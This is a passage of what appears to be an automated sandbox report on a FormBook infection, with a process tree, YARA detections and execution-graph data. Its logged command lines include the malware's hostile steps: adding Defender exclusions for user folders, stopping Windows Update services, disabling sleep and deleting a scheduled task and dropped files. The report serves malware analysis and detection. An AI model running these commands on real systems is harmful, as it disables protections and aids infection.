                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:26
                                                                              Start time:09:46:01
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                              Imagebase:0x7ff7b4ee0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:27
                                                                              Start time:09:46:01
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                              Imagebase:0x7ff741d30000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Has exited:true

                                                                              Target ID:28
                                                                              Start time:09:46:01
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:29
                                                                              Start time:09:46:03
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\SysWOW64\raserver.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                              Imagebase:0xf0000
                                                                              File size:107'520 bytes
                                                                              MD5 hash:D1053D114847677185F248FF98C3F255
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.2486958319.0000000004460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001D.00000002.2486958319.0000000004460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.2486958319.0000000004460000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.2486958319.0000000004460000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.2486958319.0000000004460000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.2475448854.0000000002560000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001D.00000002.2475448854.0000000002560000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.2475448854.0000000002560000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.2475448854.0000000002560000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.2475448854.0000000002560000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.2487485733.0000000004490000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001D.00000002.2487485733.0000000004490000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.2487485733.0000000004490000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.2487485733.0000000004490000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.2487485733.0000000004490000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Has exited:false

                                                                              Target ID:30
                                                                              Start time:09:46:08
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:/c del "C:\Users\user~1\AppData\Local\Temp\pznhcda.exe"
                                                                              Imagebase:0x410000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:32
                                                                              Start time:09:46:08
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:33
                                                                              Start time:09:46:08
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:/c del "C:\Users\user\Desktop\a\sbinzx.exe"
                                                                              Imagebase:0x410000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:35
                                                                              Start time:09:46:08
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:37
                                                                              Start time:09:46:13
                                                                              Start date:26/10/2023
                                                                              Path:C:\Program Files (x86)\rGrAmoMoqMwuTqnZRCybwYGKPnpcLDMjCfBRghbDIpwgyLgTSyrgXdXQGZfChuqeGs\LkeNkIcFYvnikmw.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\rGrAmoMoqMwuTqnZRCybwYGKPnpcLDMjCfBRghbDIpwgyLgTSyrgXdXQGZfChuqeGs\LkeNkIcFYvnikmw.exe"
                                                                              Imagebase:0x4b0000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000025.00000002.2495734545.0000000004EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000025.00000002.2495734545.0000000004EC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              Has exited:false

                                                                              Target ID:38
                                                                              Start time:09:46:13
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                              Imagebase:0x7ff764ad0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:39
                                                                              Start time:09:46:13
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:40
                                                                              Start time:09:46:13
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:sc stop UsoSvc
                                                                              Imagebase:0x7ff661e90000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:41
                                                                              Start time:09:46:14
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:sc stop WaaSMedicSvc
                                                                              Imagebase:0x7ff661e90000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:42
                                                                              Start time:09:46:14
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:sc stop wuauserv
                                                                              Imagebase:0x7ff661e90000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:43
                                                                              Start time:09:46:14
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:sc stop bits
                                                                              Imagebase:0x7ff661e90000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:44
                                                                              Start time:09:46:14
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:sc stop dosvc
                                                                              Imagebase:0x7ff661e90000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:45
                                                                              Start time:09:46:15
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                              Imagebase:0x7ff764ad0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:47
                                                                              Start time:09:46:15
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:48
                                                                              Start time:09:46:15
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
                                                                              Imagebase:0x7ff7697b0000
                                                                              File size:235'008 bytes
                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:50
                                                                              Start time:09:46:15
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:51
                                                                              Start time:09:46:15
                                                                              Start date:26/10/2023
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                              Imagebase:0x7ff6b8520000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Reset < >
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2518212462.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffaaccc0000_New_Text_Document.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: x^]I
                                                                                • API String ID: 0-3925380856
                                                                                • Opcode ID: b021cff8b8f7e7c4d1c4d86f9ba99896d0c289cd8368bf3ec11bf21cb0911477
                                                                                • Instruction ID: 6bbb269befd0f4f67e19b8d45746dc434399b45da99df326be2bd21060f73a54
                                                                                • Opcode Fuzzy Hash: b021cff8b8f7e7c4d1c4d86f9ba99896d0c289cd8368bf3ec11bf21cb0911477
                                                                                • Instruction Fuzzy Hash: 34C17872A0EA499FF74AEB6884516B97BD1FF95300B1480BED08DC36D3DD28D84987C0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:8%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:44
                                                                                Total number of Limit Nodes:5
                                                                                execution_graph 14794 22c4668 14795 22c467a 14794->14795 14796 22c4686 14795->14796 14798 22c4779 14795->14798 14799 22c479d 14798->14799 14803 22c4878 14799->14803 14807 22c4888 14799->14807 14805 22c48af 14803->14805 14804 22c498c 14804->14804 14805->14804 14811 22c44b0 14805->14811 14809 22c48af 14807->14809 14808 22c498c 14808->14808 14809->14808 14810 22c44b0 CreateActCtxA 14809->14810 14810->14808 14812 22c5918 CreateActCtxA 14811->14812 14814 22c59db 14812->14814 14815 22cd180 14816 22cd1c6 GetCurrentProcess 14815->14816 14818 22cd218 GetCurrentThread 14816->14818 14819 22cd211 14816->14819 14820 22cd24e 14818->14820 14821 22cd255 GetCurrentProcess 14818->14821 14819->14818 14820->14821 14822 22cd28b 14821->14822 14823 22cd2b3 GetCurrentThreadId 14822->14823 14824 22cd2e4 14823->14824 14825 22cadf0 14826 22cadff 14825->14826 14828 22caed9 14825->14828 14829 22caeed 14828->14829 14831 22caf1c 14829->14831 14836 22cb170 14829->14836 14840 22cb180 14829->14840 14830 22caf14 14830->14831 14832 22cb120 GetModuleHandleW 14830->14832 14831->14826 14833 22cb14d 14832->14833 14833->14826 14837 22cb194 14836->14837 14838 22cb1b9 14837->14838 14844 22ca270 14837->14844 14838->14830 14841 22cb194 14840->14841 14842 22ca270 LoadLibraryExW 14841->14842 14843 22cb1b9 14841->14843 14842->14843 14843->14830 14846 22cb360 LoadLibraryExW 14844->14846 14847 22cb3d9 14846->14847 14847->14838 14848 22cd7d0 DuplicateHandle 14849 22cd866 14848->14849

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 295 22cd170-22cd20f GetCurrentProcess 299 22cd218-22cd24c GetCurrentThread 295->299 300 22cd211-22cd217 295->300 301 22cd24e-22cd254 299->301 302 22cd255-22cd289 GetCurrentProcess 299->302 300->299 301->302 304 22cd28b-22cd291 302->304 305 22cd292-22cd2ad call 22cd758 302->305 304->305 308 22cd2b3-22cd2e2 GetCurrentThreadId 305->308 309 22cd2eb-22cd34d 308->309 310 22cd2e4-22cd2ea 308->310 310->309
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 022CD1FE
                                                                                • GetCurrentThread.KERNEL32 ref: 022CD23B
                                                                                • GetCurrentProcess.KERNEL32 ref: 022CD278
                                                                                • GetCurrentThreadId.KERNEL32 ref: 022CD2D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269828635.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_22c0000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: be59ee2d164dc9cf9ae385d54a9c921fb292957fb70b61544b54f2374d60d41b
                                                                                • Instruction ID: c908a1d9bc5de5b30aea5ebc08fcd6cf3377189582ea9a4c7772997efa056b7b
                                                                                • Opcode Fuzzy Hash: be59ee2d164dc9cf9ae385d54a9c921fb292957fb70b61544b54f2374d60d41b
                                                                                • Instruction Fuzzy Hash: 725198B09003098FEB14DFA9D548BDEBBF1EF88304F20806DE419A72A5D774A845CF62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 317 22cd180-22cd20f GetCurrentProcess 321 22cd218-22cd24c GetCurrentThread 317->321 322 22cd211-22cd217 317->322 323 22cd24e-22cd254 321->323 324 22cd255-22cd289 GetCurrentProcess 321->324 322->321 323->324 326 22cd28b-22cd291 324->326 327 22cd292-22cd2ad call 22cd758 324->327 326->327 330 22cd2b3-22cd2e2 GetCurrentThreadId 327->330 331 22cd2eb-22cd34d 330->331 332 22cd2e4-22cd2ea 330->332 332->331
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 022CD1FE
                                                                                • GetCurrentThread.KERNEL32 ref: 022CD23B
                                                                                • GetCurrentProcess.KERNEL32 ref: 022CD278
                                                                                • GetCurrentThreadId.KERNEL32 ref: 022CD2D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269828635.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_22c0000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 574089dc42f33111a5d25e8d475f2d2ad4dd989a8770a8c1fca6eb91d5f7ce13
                                                                                • Instruction ID: f98194dfb7bb69b9b7954a3695525848ebcc1f9327a64133e86f62ff5b0d195d
                                                                                • Opcode Fuzzy Hash: 574089dc42f33111a5d25e8d475f2d2ad4dd989a8770a8c1fca6eb91d5f7ce13
                                                                                • Instruction Fuzzy Hash: 2C5188B09003098FEB14EFAAC548B9EBBF1EF88314F20816DE419A7355D774A845CF66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 668 22caed9-22caef7 670 22caef9-22caf06 call 22ca20c 668->670 671 22caf23-22caf27 668->671 676 22caf1c 670->676 677 22caf08 670->677 672 22caf29-22caf33 671->672 673 22caf3b-22caf7c 671->673 672->673 680 22caf7e-22caf86 673->680 681 22caf89-22caf97 673->681 676->671 724 22caf0e call 22cb170 677->724 725 22caf0e call 22cb180 677->725 680->681 683 22caf99-22caf9e 681->683 684 22cafbb-22cafbd 681->684 682 22caf14-22caf16 682->676 687 22cb058-22cb118 682->687 685 22cafa9 683->685 686 22cafa0-22cafa7 call 22ca218 683->686 688 22cafc0-22cafc7 684->688 690 22cafab-22cafb9 685->690 686->690 719 22cb11a-22cb11d 687->719 720 22cb120-22cb14b GetModuleHandleW 687->720 691 22cafc9-22cafd1 688->691 692 22cafd4-22cafdb 688->692 690->688 691->692 694 22cafdd-22cafe5 692->694 695 22cafe8-22caff1 call 22ca228 692->695 694->695 700 22caffe-22cb003 695->700 701 22caff3-22caffb 695->701 703 22cb005-22cb00c 700->703 704 22cb021-22cb02e 700->704 701->700 703->704 705 22cb00e-22cb01e call 22ca238 call 22ca248 703->705 710 22cb030-22cb04e 704->710 711 22cb051-22cb057 704->711 705->704 710->711 719->720 721 22cb14d-22cb153 720->721 722 22cb154-22cb168 720->722 721->722 724->682 725->682
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 022CB13E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269828635.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_22c0000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 0fa186a413f3c8756c76b2915e799abca2cc9576fbe9e98ca2b819c3f81d82a8
                                                                                • Instruction ID: 3550613e02bc135d48268e3a1a368b8cfe6fce06d740bbd21dcd86fbdad51cbc
                                                                                • Opcode Fuzzy Hash: 0fa186a413f3c8756c76b2915e799abca2cc9576fbe9e98ca2b819c3f81d82a8
                                                                                • Instruction Fuzzy Hash: B38148B0A10B058FD724DFA9D44579ABBF1FF88304F108A2DD04AD7A54DB75E84ACB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 726 22c590d-22c598c 727 22c598f-22c59d9 CreateActCtxA 726->727 729 22c59db-22c59e1 727->729 730 22c59e2-22c5a3c 727->730 729->730 737 22c5a3e-22c5a41 730->737 738 22c5a4b-22c5a4f 730->738 737->738 739 22c5a60 738->739 740 22c5a51-22c5a5d 738->740 742 22c5a61 739->742 740->739 742->742
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 022C59C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269828635.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_22c0000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 47955c57643c3c335ab1ea573590504be1af7859ecb0d4aa2c7013635f368f0d
                                                                                • Instruction ID: ef91674484e1cd6e3070265a49488e02e70ba9b607e277fea9ba3e7d90544a13
                                                                                • Opcode Fuzzy Hash: 47955c57643c3c335ab1ea573590504be1af7859ecb0d4aa2c7013635f368f0d
                                                                                • Instruction Fuzzy Hash: 5F41E2B1C01719CFEB24CFAAC8847CEBBB1BF48314F20816AD409AB254DB756946CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 743 22c44b0-22c59d9 CreateActCtxA 747 22c59db-22c59e1 743->747 748 22c59e2-22c5a3c 743->748 747->748 755 22c5a3e-22c5a41 748->755 756 22c5a4b-22c5a4f 748->756 755->756 757 22c5a60 756->757 758 22c5a51-22c5a5d 756->758 760 22c5a61 757->760 758->757 760->760
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 022C59C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269828635.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_22c0000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: ff817685d58c16702c72638b283e1aea63b0dac0e3ae489f1ccc66f5cc776a06
                                                                                • Instruction ID: 982a97b513f1cd143eace2b22897d9e1706e20b69e1da0feeb4e06a398c97bb7
                                                                                • Opcode Fuzzy Hash: ff817685d58c16702c72638b283e1aea63b0dac0e3ae489f1ccc66f5cc776a06
                                                                                • Instruction Fuzzy Hash: 0E41E170C10719CBEB24DFAAC88478EBBF1BF48304F60816AD409AB255DB75A946CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 761 22c5a84-22c5a90 762 22c5a42-22c5a47 761->762 763 22c5a92-22c5b14 761->763 766 22c5a4b-22c5a4f 762->766 767 22c5a60 766->767 768 22c5a51-22c5a5d 766->768 770 22c5a61 767->770 768->767 770->770
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269828635.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_22c0000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6833764180c6a420065a36d01be0de57ce29f4d333b32c3c44a86bf7b27d73be
                                                                                • Instruction ID: 1e1e798659f29c1363475783d3bbd194b9b57185d0c4a5f480f7e03a8bcfb441
                                                                                • Opcode Fuzzy Hash: 6833764180c6a420065a36d01be0de57ce29f4d333b32c3c44a86bf7b27d73be
                                                                                • Instruction Fuzzy Hash: F631AB71C04749CFEB20DFE9C84479DBBF1AF45314F60829DC406AB259D7B9A94ACB41
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 771 22cd7c8-22cd864 DuplicateHandle 772 22cd86d-22cd88a 771->772 773 22cd866-22cd86c 771->773 773->772
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022CD857
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269828635.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_22c0000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 99c4ac41e2e15fc3d603a6ad0291869824da05948598bac77a0dbb1db402dd22
                                                                                • Instruction ID: 7e633bd01b022a6c1e25b077b3229f2575f2c0bed7011268331220df0f22e30b
                                                                                • Opcode Fuzzy Hash: 99c4ac41e2e15fc3d603a6ad0291869824da05948598bac77a0dbb1db402dd22
                                                                                • Instruction Fuzzy Hash: A42116B5D002089FDB10CFAAD885ADEBFF5FB48310F10852AE918A3310C3749942CF60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 776 22cd7d0-22cd864 DuplicateHandle 777 22cd86d-22cd88a 776->777 778 22cd866-22cd86c 776->778 778->777
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022CD857
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1269828635.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_22c0000_audiodgse.jbxd
                                                                                Similarity
